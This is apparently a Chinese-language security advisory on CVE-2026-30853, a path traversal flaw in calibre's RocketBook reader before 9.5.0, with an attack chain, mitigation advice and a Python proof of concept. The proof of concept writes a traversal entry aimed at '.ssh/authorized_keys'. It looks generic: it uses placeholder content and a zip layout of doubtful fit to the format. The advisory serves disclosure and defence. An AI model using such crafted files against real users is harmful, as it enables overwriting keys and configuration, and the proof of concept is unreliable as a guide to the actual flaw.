CVE-2026-30853 CVSS 5.0 中危

CVE-2026-30853 Calibre RocketBook路径遍历漏洞

披露日期: 2026-03-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-30853

漏洞类型

路径遍历

CVSS评分

5.0 中危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

calibre

漏洞概述

calibre是一款跨平台电子书管理器，用于查看、转换、编辑和组织电子书。9.5.0之前的版本中，RocketBook（.rb）输入插件存在路径遍历漏洞，攻击者可以通过构造恶意的.rb文件，在calibre进程具有写权限的任意路径下写入任意文件。该漏洞与CVE-2026-26065修复的PDB阅读器漏洞属于同一类型，但当时修复未应用到RB阅读器。攻击成功需要用户打开或转换特制的.rb文件，CVSS评分为5.0，属于中等严重程度。

技术细节

该路径遍历漏洞位于calibre的src/calibre/ebooks/rb/reader.py文件中。漏洞根源在于处理.rb文件时未对文件路径进行充分的验证和清理。攻击者可以通过在.rb文件中嵌入包含路径遍历序列（如../）的文件路径，使得calibre在解析和写入文件时，将文件内容写入攻击者指定的目标路径。攻击者可以利用此漏洞覆盖系统关键文件、配置文件或植入恶意代码。由于攻击向量为本地（AV:L）且需要用户交互（UI:R），实际利用难度中等。calibre进程以当前用户权限运行，因此攻击者只能写入该用户有权访问的路径。

攻击链分析

STEP 1

步骤1

攻击者创建包含路径遍历payload的恶意.rb文件

STEP 2

步骤2

受害者通过calibre打开或转换恶意.rb文件

STEP 3

步骤3

calibre的RocketBook插件解析.rb文件时未正确验证路径

STEP 4

步骤4

利用路径遍历序列（如../）将文件内容写入攻击者指定的目标路径

STEP 5

步骤5

攻击者可覆盖系统文件、配置文件或植入恶意代码

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2026-30853 PoC - Calibre RocketBook Path Traversal
Generate a malicious .rb file that attempts to write to arbitrary path
"""
import zipfile
import os

def create_malicious_rb(output_path, target_file):
    """
    Create a malicious RocketBook (.rb) file with path traversal payload
    """
    with zipfile.ZipFile(output_path, 'w') as rb_file:
        # Path traversal payload to write to arbitrary location
        # The actual exploitation depends on the specific vulnerability in reader.py
        malicious_content = b'Crafted RB content with path traversal'
        
        # Add the malicious content file with path traversal sequence
        traversal_path = f"../../../../../../{target_file}"
        rb_file.writestr(traversal_path, malicious_content)
        
        # Add main content file
        rb_file.writestr('content.rb', b'Main ebook content')
        
    print(f"[+] Created malicious .rb file: {output_path}")
    print(f"[+] Target path: {target_file}")

if __name__ == '__main__':
    # Example usage
    output = 'malicious_book.rb'
    target = '.ssh/authorized_keys'  # Example target for remote code execution
    create_malicious_rb(output, target)

影响范围

calibre < 9.5.0

防御指南

临时缓解措施

立即升级calibre到9.5.0版本以修复此漏洞。在升级前，避免打开来源不明的.rb文件，特别是从未知或不可信来源获取的电子书文件。可考虑使用沙箱环境运行calibre以限制潜在的恶意文件写入行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表